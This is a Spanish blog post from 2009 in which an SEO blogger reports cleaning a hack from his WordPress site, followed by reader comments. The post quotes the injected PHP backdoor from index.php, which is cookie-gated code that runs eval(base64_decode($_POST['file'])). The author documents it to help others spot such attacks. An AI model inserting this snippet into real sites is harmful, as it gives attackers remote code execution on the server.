solucionado ataque con script en base 64

En primer lugar siento las molestias, los comentarios borrados, los test que os habrán hecho pingback con basura en google reader y demás.

En segundo lugar siento la tardanza en haberlo limpiado, se que no queda muy profesional tener un blog de seo siempre lleno de mierda, pero han sido dias complicados y ahora vuelven a la normalidad.

Ataque en base 64

Siendo sincero, localizar estos ataques, la primera vez es un poco más jodido, pero las siguientes es méramente, aburrido, sólo hay que saber qué buscar.

—————-?php if(md5($_COOKIE['d8247a26d234dcaa'])==”34ca2006680a2b3085f5f6d91d0e68f0″){ eval(base64_decode($_POST['file'])); exit; } ?><?php if(md5($_COOKIE['092166dd9df91c4e'])==”3ec01dce09197d3d55b363752a36ed83″){ eval(base64_decode($_POST['file'])); exit; } ?><?php if(md5($_COOKIE['fce815a7e4b69c98'])==”e86601a7a2929a8a0e4148c8e76ea64c”){  exit; } ?><?php if(md5($_COOKIE['140bc4b508ddc0f7'])==”189d3078bf10577aa8d4bc53e26cd3e2″){  exit; } ?><?php———-

Los black hat con tiempo libre y mala ostia han evolucionado bastante desde que hackeaban la cuenta de wodpress y te metían enlaces en los footer, al final cuando ves que tienes mil enlaces ocultos en la plantilla, no es dificil localizar en alguna parte del template esos textos, pero al ponerlo en base 64 y cargar los enlaces desde una hubicación externa, cuesta más, sobre todo porque por lo general, no se encuentran en la plantilla de tu wordpress sino en algunas tablas adicionales.

Este estaba en las plantillas de index.php, pero no se mostraba desde el panel de editar el tema de WP, ha sido al volcar todo a local cuando lo he visto. Básicamente el objeto de este código es localizar si quien accede es Google y mostrarle un contenido que descarga de otro lugar. Vosotros lo veíais en las RSS de Google Reader y yo todo felíz con mi netvibes, no me di cuenta.
Gracias por ayudarme.

Ahora ya con el blog limpio, al menos Google Reader me indica que lo está, me toca pelearme con Google… Perezaaaa

Si te gustó, compartelo compañero
[del.icio.us] [Google] [Ma.gnolia] [Mister Wong] [Technorati] [Windows Live] [Yahoo!]

actualizaciones por RSS!

July 16, 2009 • Tags: ,

15 Other Comments

10 Responses to “solucionado ataque con script en base 64”

  1. diseño web valencia - July 16th, 2009

    Pues mira que yo ayer entré en tu sitio, y me quedé un poco flipado con lo que veía en el post de seo en china, pero pensé que igual era una prueba, o que se yo.
    Vaya putadón.

  2. vseo - July 16th, 2009

    la verdad es que con los disparates que termino haciendo, cualquier cosa es posible.
    Lo que de verdad me jode, es que al mostrarse en las rss ataca a los usuarios más fieles y al final, afecta a algo más que el mero posicionamiento.

  3. Marketing web - July 16th, 2009

    Me alegro que hallas podido solucionarlo.

  4. desarrollo web - July 16th, 2009

    Yo también me alegro que hayas podido solucionarlo, por lo que he observado en los últimos meses Javier parece que estás en el punto de mira, ya que has recibido varioas ataques de distintas tipologías…

    Un saludo y ánimo.

  5. nico - July 17th, 2009

    ¿cual fue el problema? ¿Tenías la última versión de WP?

    ¿alguna sugerencia de seguridad?

    Un saludo.

  6. Abelardo - July 17th, 2009

    Cuando lei el reader pense que era un truco. No entendia nada. Bien por ti que lo hayas encontrado.

    Por otro lado, es de mi interés la pregunta que hace “nico” con respecto al ultimo wp. Y te formulo uno yo: a ese base64, solo lo borraste?

    Un abrazo
    Abelardo

  7. Masias en venta - July 17th, 2009

    Y la gente esta no tiene nada más que hacer? Para un entendido cono tu ok pero para la mayoría de la gente eso pasaría desapercibido hasta el machaque en el posicionamiento y flipando colorines.

    Saludos

    Rafa

  8. Diseño web Ciudad Real - July 21st, 2009

    Es el pan de cada día, es llegar el verano y todo tipo de ataques se incrementa, yo actualizé varios joomla y cuando acabé con el último ya me habían puteado 6,… sobre la marcha,… alucinante.

  9. diseño web barcelona - July 31st, 2009

    Sabes por donde ha podido venir el ataque?? Lo digo para estar atento porque no eres el primero que ha tenido este problema, pero creo que todavía no se sabe bien donde está la vulnerabilidad.

  10. Diseño web Ciudad Real - August 10th, 2009

    Si al instalar modificamos el prefijo por defecto de las tablas de la db se reducen bastante este tipo de ataques y lo digo por experiencia.

Leave a Reply

Additional comments powered by BackType